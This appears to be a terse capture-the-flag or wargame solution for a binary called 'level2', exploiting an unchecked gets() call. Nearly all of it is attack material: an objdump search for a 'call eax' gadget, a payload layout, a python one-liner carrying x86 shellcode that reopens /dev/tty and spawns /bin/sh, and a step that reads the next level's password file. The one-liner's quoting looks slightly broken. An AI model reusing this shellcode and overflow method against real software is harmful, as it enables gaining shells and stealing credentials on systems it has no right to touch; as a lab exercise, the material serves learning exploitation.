objdump -M intel -d level2 | grep "call.*eax"
	80484cf:	ff d0                	call   eax

payload = | SHELLCODE | PADDING * (BUFF_SIZE - SHELLCODE_SIZE) | CALL EAX ADDRESS |

to exploit gets() we need a shellcode that closes stdin and re-opens /dev/tty and then execve("/bin/sh")

python -c 'print "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "A"*(80 - 55) + ""\x08\x04\x84\xcf"[::-1]"'

then cd ../level3; cat .pass
